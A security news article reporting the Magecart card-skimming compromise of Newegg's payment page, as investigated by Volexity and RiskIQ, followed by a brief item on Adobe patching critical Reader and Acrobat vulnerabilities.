Online Retailer Newegg Hit by Magecart Card Skimming Gang

The same attackers believed to be responsible for the recent breach of British Airways customer payment data have injected card skimming code into the site of U.S. online retailer Newegg.com.

The code was identified by researchers from security firms Volexity and RiskIQ in a joint investigation and was removed from the site Sept. 18, when the two companies privately shared their findings with the retailer.

“Yesterday we learned one of our servers had been injected with malware which was identified and removed from our site,” Newegg announced on Twitter. “We’re conducting extensive research to determine exactly what info was obtained and are sending emails to customers potentially impacted.”

According to Volexity and RiskIQ, the malicious snippet of code is very similar to the one found on BA’s website but has been specifically customized for Newegg’s platform. In fact, evidence suggests that Newegg was compromised before BA, the code appearing on the retailer’s website Aug. 14.

“The skimmer was put on the payment processing page itself, not in a script, so it would not show unless the payment page was hit,” the RiskIQ researchers said in a report.

The payment processing page is the place where customers enter their payment card details after they go through the previous steps of adding products in their carts and entering their delivery addresses for validation.

As in the BA case, the malicious skimming code collected all information entered into the payment form, serialized it and sent it to a domain name called neweggstats.com that was registered by the attackers Aug. 13. Also, as in the BA attack, the malicious code was triggered for both desktop and mobile users.

The attackers used a valid TLS certificate on their domain so the data could be siphoned off over HTTPS, most likely to avoid triggering mixed-content warnings on Newegg’s own website.

Newegg and BA are just the latest in a long string of companies that have fallen victim to this hacker group, which is known in the security industry as Magecart. Other high-profile companies hit by the gang in recent months include Ticketmaster UK, Feedify and Filipino broadcaster ABS-CBN.

“Magecart attacks are surging—RiskIQ’s automatic detections of instances of Magecart breaches pings us almost hourly,” RiskIQ said. “Meanwhile, we’re seeing attackers evolve and improve over time, setting their sights on breaches of large brands. While some Magecart groups still target smaller shops, the subgroup responsible for the attacks against Newegg and British Airways is particularly audacious, performing cunning, highly targeted attacks with skimmers that seamlessly integrate into their targets’ websites.”

Newegg has not yet confirmed that payment card details have been compromised in this attack, but giving where the code was planted, what it was designed to do and the group’s previous success on BA’s website—380,000 compromised transactions—it’s likely that the impact will be similar.

Magecart is only not the only group using JavaScript-based card skimming code. A researcher reported recently that another group dubbed MagentoCore managed to compromise more than 7,000 Magento-based online shops in this manner, some belonging to multi-million dollar brands.

“While Magecart may be a major threat which eCommerce companies need to protect against, the larger issue is the increasing use of JavaScript-based Data Theft Frameworks,” Volexity warned in its report. “MageCart, as well as other criminal tools such as JS Sniffer, show how a few simple lines of JavaScript on a compromised eCommerce site can lead to a devastating amount of information being stolen.”

Adobe Patches Critical Vulnerabilities in Reader and Acrobat

Adobe Systems has released new security updates for its Reader and Acrobat products, fixing seven vulnerabilities that are rated critical and important.

Only one flaw, tracked as CVE-2018-12848, is rated critical and was reported by Omri Herscovici, a vulnerability researcher with Check Point Software Technologies. The vulnerability is an out-of-bounds write that can lead to arbitrary code execution.

The other six flaws are out-of-bound reads and can lead to information disclosure. They are rated as important because they can potentially be chained together with other vulnerabilities to enable exploits.

Adobe advises users to upgrade to Acrobat and Reader DC 2018.011.20063, if they are on the “continuous” track, Acrobat and Reader DC Classic 2017 2017.011.30102 or Acrobat and Reader DC Classic 2015 2015.006.30452.

Featured eBook
Open Source Security Management in the Age of DevOps

Open Source Security Management in the Age of DevOps

WhiteSource and MediaOps (DevOps.com and Security Boulevard) conducted a survey of more than 400 organizations to understand their policies, processes and tools in managing the risk associated with the use of open source components in their applications. In our analysis of the survey results, we broke out responses into two buckets: those organizations that have ... Read More
WhiteSource

Lucian Constantin

Lucian has been covering computer security and the hacker culture for almost a decade, his work appearing in many technology publications including PCWorld, Computerworld, Network World, CIO, CSO, Forbes and The Inquirer. He has a bachelor's degree in political science, but has been passionate about computers and cybersecurity from an early age. Before he chose a career in journalism, Lucian worked as a system and network administrator. He enjoys attending security conferences and delving into interesting research papers. You can reach him at lucian@constantinsecurity.com or @lconstantin on Twitter. For encrypted email, his PGP key's fingerprint is: 7A66 4901 5CDA 844E 8C6D 04D5 2BB4 6332 FC52 6D42

lucian-constantin has 293 posts and counting.See all posts by lucian-constantin